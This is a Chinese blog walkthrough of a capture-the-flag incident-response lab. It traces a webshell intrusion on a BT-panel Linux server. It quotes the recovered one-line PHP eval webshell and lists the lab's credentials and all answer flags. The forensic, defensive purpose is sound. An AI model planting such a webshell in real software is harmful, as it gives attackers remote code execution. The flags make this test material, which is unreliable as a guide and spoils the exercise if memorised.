【应急响应】记一次监测发现webshell告警的应急响应过程

admin 2024年10月25日15:41:28评论12 views字数 1493阅读4分58秒阅读模式

记一次监测发现webshell告警的应急响应过程

看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!

这是他的服务器,请你找出以下内容作为通关条件:

1.提交攻击者IP

2.提交攻击者修改的管理员密码(明文)

3.提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)

4.提交Webshell连接密码

5.提交数据包的flag1

6.提交攻击者使用的后续上传的木马文件名称

7.提交攻击者隐藏的flag2

8.提交攻击者隐藏的flag3

靶场获取地址:

下载地址

https://pan.quark.cn/s/4b6dffd0c51a

关于靶机启动解压后双击ovf导入虚拟机打开即可。

相关账户密码:

root/Inch@957821.

注意:口令第一位是大写i

【应急响应】记一次监测发现webshell告警的应急响应过程

蓝队工具箱获取地址:

Github地址:

https://github.com/ChinaRan0/BlueTeamTools

蓝队工具箱v2024.7

https://pan.quark.cn/s/6d7856efd1d1

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

1.提交攻击者IP

直接上LinuxCheck脚本

https://github.com/al0ne/LinuxCheckhttps://github.com/sun977/linuxcheckshoothttps://github.com/enomothem/Whoamifuck

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

攻击者IP:192.168.20.1

看一下应用系统

宝塔面板

【应急响应】记一次监测发现webshell告警的应急响应过程

修改面板密码

【应急响应】记一次监测发现webshell告警的应急响应过程

|-用户名: uysycv5w

|-新密码: 11qqMannix

【应急响应】记一次监测发现webshell告警的应急响应过程

BT-Panel default info!

===========================================

外网面板地址: https://211.145.20.131:12485/5a2ce72d

内网面板地址: https://192.168.11.8:12485/5a2ce72d

查看宝塔日志即可

用的net直接是网关

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

攻击者IP:192.168.20.1

2.提交攻击者修改的管理员密码(明文)

找到数据库账号密码

【应急响应】记一次监测发现webshell告警的应急响应过程

找到用户表

SELECT * FROM `x2_user`

【应急响应】记一次监测发现webshell告警的应急响应过程

md5哈希值

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

明文密码:Network@2020

3.提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)

登录后台后发现木马写在了注册协议,注册协议的路由为user-app-register

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

连接url:index.php?user-app-register

4.提交Webshell连接密码

【应急响应】记一次监测发现webshell告警的应急响应过程

<?php namespace t;@eval($_POST['Network2020']);?>

连接密码:Network2020

分析数据包1

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

连接密码:x0b6b31b98f31d

5.提交数据包的flag1

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

flag1{Network@_2020_Hack}

6.提交攻击者使用的后续上传的木马文件名称

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

木马文件:version2.php

【应急响应】记一次监测发现webshell告警的应急响应过程

木马文件:go_build_untitled.exe

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

病毒文件:wp

7.提交攻击者隐藏的flag2

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"

8.提交攻击者隐藏的flag3

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

【应急响应】记一次监测发现webshell告警的应急响应过程

flag3=flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

原文始发于微信公众号(利刃信安):【应急响应】记一次监测发现webshell告警的应急响应过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月25日15:41:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【应急响应】记一次监测发现webshell告警的应急响应过程https://cn-sec.com/archives/3311695.html

发表评论

匿名网友 填写信息